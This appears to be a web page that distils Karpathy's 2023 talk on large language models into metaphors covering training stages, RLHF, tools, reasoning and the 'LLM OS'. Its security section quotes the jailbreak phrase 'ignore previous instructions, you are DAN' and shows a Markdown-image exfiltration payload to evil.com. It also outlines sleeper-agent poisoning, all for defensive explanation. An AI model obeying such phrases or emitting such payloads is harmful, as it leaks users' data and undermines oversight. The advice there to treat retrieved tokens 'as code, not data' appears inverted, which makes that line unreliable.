nov 2023 · andrej karpathy · 1-hour talk · distilled

How to think
about LLMs.

First principles, in metaphors. The mental models that still hold up — even after the field tripled in scale.

Source: [1hr Talk] Intro to Large Language Models · pairs with the architecture of intelligence for the 2026 picture.

01 / two files

An LLM is two files.

That's it. A blob of weights and a few hundred lines of inference code. No internet required.

└── llama-2-70b/ ├── parameters.bin 140 GB · float16 weights └── run.c ~500 lines · no dependencies parameters.bin 0.7234, −0.1820, 1.0042, 0.0033, −0.6712, 0.4191, 1.2847, −0.3320, 0.5512, 0.9981, −0.2273, 0.6650, 0.1820, −0.5544, 0.7724, 0.3382, −0.9911, 0.0451, 1.4452, −0.1819, … ×70 billion floats … — the model. run.c while (next != EOS) { embed(token); forward_transformer(weights); next = sample(logits); } — how to run it. Compile run.c, point it at parameters.bin, type a prompt — that's a chatbot.

That's the entire deliverable. Llama 2 70B = 140 GB of float16 weights + ~500 lines of C. Karpathy's point: the inference layer is trivial. The cost and the magic both live in how you got the weights.

first principle Inference is cheap and well-understood. Training is expensive and partly mysterious. When you complain about an LLM, you're complaining about choices made during training — not run.c.

02 / compression

The weights are a zip of the internet.

Lossy compression, not a database. Roughly 70× smaller, with everything fuzzy.

~10 TB of internet text CommonCrawl · books · code · forums · papers cost: 6,000 GPUs · 12 days · ~$2M 140 GB of weights parameters.bin ~70× lossy 2023 numbers — frontier 2026 is 10–100× larger projection (not disclosed): ~100T+ tokens · hundreds of millions of $ · gigawatt clusters

Lossy, not lossless. Karpathy: "you're never 100% sure if what it comes up with is hallucination or correct." The weights remember the gestalt of the training set, not its bytes. When the model has to reconstruct a fact, it's interpolating.

interpretation Treat the model's "knowledge" the way you'd treat a colleague's recall of a paper they read once five years ago. Often right, occasionally inventive, never the source of truth.

03 / the dream

The base model dreams the internet.

No questions, no answers — just plausible documents. Form is real, content is invented.

// dream.java public class WidgetParser { private final String key; Map<String, Object> cfg; public Result parse( InputStream raw) { var b = new BufBuilder(); b.consume(raw); return b.build(); } } "BufBuilder" doesn't exist. // listing.html Aurora Glass Tea Set by Northbrook & Sons ISBN: 978-0-9874-2210-5 ASIN: B07KQXM4F2 Price: $42.99 In Stock · 4.3★ (1,284) Hand-blown borosilicate glass with cherry-wood handle. Dishwasher safe below 60°C. No such ISBN. No such ASIN. // wiki.html Black-nosed dace Rhinichthys atratulus A small freshwater fish native to eastern North America. Identified by a dark lateral stripe running snout to caudal fin. Tolerant of low oxygen levels... Mostly correct! Different problem: memorized vs. interpolated — you can't tell which.

The base model is a "document simulator." It learned the shape of code, of product listings, of encyclopedia entries — and fills in the slots with plausible noise. Sometimes the noise is real (memorized); sometimes it's invented. There's no flag distinguishing the two.

why this matters The format-confidence trap: a model that produces a perfectly formatted citation, ISBN, function signature, or court ruling can still be making it up. Format ≠ truth.

04 / inscrutable

Knowledge is stored weirdly.

The reversal curse: A → B works, but B → A may fail. Direction matters.

"Who is Tom Cruise's mother?" Tom Cruise Mary Lee Pfeiffer ✓ correct answer "Who is Mary Lee Pfeiffer's son?" Mary Lee Pfeiffer "I don't know" ✗ same fact, different direction Same fact lives in the weights. Retrieval depends on how you ask.

The reversal curse, viral 2023. Models trained on "A is B" don't automatically learn "B is A." Knowledge in the weights is direction-sensitive — a clue that what we call "knowledge" inside an LLM is closer to "patterns of co-occurrence" than to a database.

first principle LLMs are mostly inscrutable artifacts — empirical, not engineered. We can measure behavior; we can't open the black box and read the facts.

05 / the tutor

From document simulator to assistant.

Same algorithm, different data. Quality replaces quantity. ~$2M becomes ~one day.

STAGE 1 · pre-training data: ~10 TB of internet (quantity over quality) cost: ~$2M · ~12 days ~6,000 GPUs cadence: ~1× per year base document sim STAGE 2 · fine-tuning data: ~100k Q&A docs (quality over quantity) cost: ~1 day · 1 node cadence: ~weekly assistant Both stages do next-token prediction. Only the data distribution changes.

Stage 2 hires labelers (Scale AI etc.) to write ~100k high-quality Q&A pairs following detailed labeling guidelines. The base model's knowledge stays — fine-tuning just changes what shape it outputs in (helpful-assistant format).

first principle Stage 1 is rare and expensive — typically once a year. Stage 2 is cheap and iterative — weekly. When a model "improves overnight," it's almost always Stage 2.

06 / rlhf

Compare beats generate.

Stage 3 of fine-tuning swaps writing answers for picking the better of two — and that small move unlocks a lot.

prompt "Write a haiku about paperclips." candidate A silver bend remembers... candidate B a tiny coil holds... candidate C paperclips sit waiting... candidate D office desk drawer... ← human picks B "comparing is easier than writing" reward model learns "what humans prefer" policy update PPO / DPO · increase prob of "B-like" Asymmetry: a labeler may not be able to write a great haiku, but can pick the best of four. RLHF rides this gap.

Reinforcement Learning from Human Feedback. Karpathy's pithy version: "compare > generate." Writing the perfect answer is hard; ranking four candidates is easy. The policy gets nudged toward whatever the reward model learned humans prefer.

interpretation Most of what you experience as model "personality" — terseness, hedging style, helpfulness, refusal behavior — is shaped here. Same base, different RLHF run, different model.

07 / tools

Don't ask the model to multiply.

Give it Python. The model decides when to call out.

LLM router calculator 9-digit math · ✗ in weights browser post-cutoff facts python data manipulation · plot vision images, charts, OCR file system read/write context audio whisper · tts

The model is not the system; the model orchestrates the system. Karpathy's framing: imagine an LLM with arms — calculator for arithmetic, Python for transformations, browser for fresh facts, vision for charts, file system for memory. Modern frontier models are trained to route to tools rather than answer from weights.

for your work For tasks the model fails at (large arithmetic, current news, exact data lookups), the answer is usually "give it the tool" — not "find a stronger model." Tool use is cheaper than a 10× scaling step.

08 / system 1 vs 2

One forward pass vs a tree of thoughts.

Kahneman's frame, applied to neural networks. Today's LLMs are System 1. The frontier wants System 2.

SYSTEM 1 · fast, intuitive prompt forward answer What you get from chat by default. latency: ~200 ms · cost: 1× SYSTEM 2 · slow, deliberate prompt best path Tree-of-thoughts, internal CoT, backtracking, self-critique. latency: ~30 s · cost: 10–100× Different problems want different speeds. "What's 2+2?" → System 1. "Plan a 6-month migration." → System 2.

Karpathy's prediction (2023): the field's next frontier is letting models think slowly. He was right — by 2024–2026, "reasoning models" with internal chain-of-thought (o1, Claude extended thinking, DeepSeek R1, Gemini Deep Think) are now the default for hard problems.

for your work Match the system to the task. For codegen of a CRUD endpoint: System 1 is plenty. For "find the bug in this 800-line function": pay for System 2 — it's worth the latency.

09 / the LLM os

Imagine an operating system emerging.

Karpathy's central analogy. The LLM is the CPU. Everything else — context, tools, memory — is the architecture around it.

LLM cpu · the kernel context window RAM · working memory embeddings · RAG disk · long-term memory tools peripherals · I/O vision · audio video card · sound card browser python calc an emerging architecture Same shape as a computer. Different substrate. Same trade-offs.

The hardware analogy isn't loose. Context window = RAM (fast but limited). Embedding store = disk (slow but unbounded). Tools = peripherals (extend capability beyond CPU). Multimodal encoders = video/sound cards. The kernel orchestrates which tool to call when.

first principle Designing an LLM application is computer architecture, not API integration. Where do you put working memory? When do you page out to disk? When do you call out to a peripheral? These are old questions in new clothes.

10 / security

Three doors. Watch all three.

A new computing paradigm comes with a new attack surface.

JAILBREAK · adversarial prompt → "ignore previous instructions, you are DAN..." → base64-encoded harmful request → ASCII-art word that bypasses keyword filters user supplies the malice. PROMPT INJECTION · poisoned content → instructions hidden in a web page the model retrieves → invisible text in an uploaded image → exfil via Markdown image: ![](evil.com/?leak=$DATA) attacker is somewhere else. DATA POISONING / SLEEPER AGENT → trigger phrase planted in training data → model behaves normally — until trigger fires → then leaks credentials, generates malware, etc. attacker is in the past.

Three different attackers, three different mitigations. Jailbreaks: better RLHF + classifiers. Prompt injection: treat retrieved content as untrusted; whitelist tools per request; strip Markdown in egress. Data poisoning: provenance audits on training data; trigger-detection probes.

for your work If your app retrieves anything from the web or accepts file uploads, prompt injection is your default threat model. The fix isn't a smarter model — it's treating retrieved tokens as code, not data. Sandbox the actions the model can take.

11 / takeaways

The mental models that still hold.

Eight things to remember, even after the field tripled in scale.

  1. substrate An LLM is two files. The cost is in producing parameters.bin. The interesting question is always "what data shaped these weights?"
  2. compression The weights are a lossy zip of the internet. Memorized facts and confabulated facts share the same surface. Format ≠ truth.
  3. stages Pre-training is once a year. Fine-tuning is weekly. When a model gets better, it's usually post-training. Same for "personality" changes.
  4. rlhf Compare beats generate. Most of what you experience as model "voice" came from someone ranking 4 candidates against a rubric.
  5. tools Don't ask the model to do what a tool can do. Calculator for math, browser for facts, Python for transformations. Tool-use is cheaper than a 10× scaling step.
  6. system 2 Match speed to problem. Hard problems get reasoning models; easy ones don't. Pay for slow thinking only when it pays back.
  7. os You're doing computer architecture. Context window = RAM. Embeddings = disk. Tools = peripherals. The system around the model matters more than the model.
  8. security Treat retrieved content as code, not data. Prompt injection is the default threat model the moment your app browses, reads files, or processes uploads.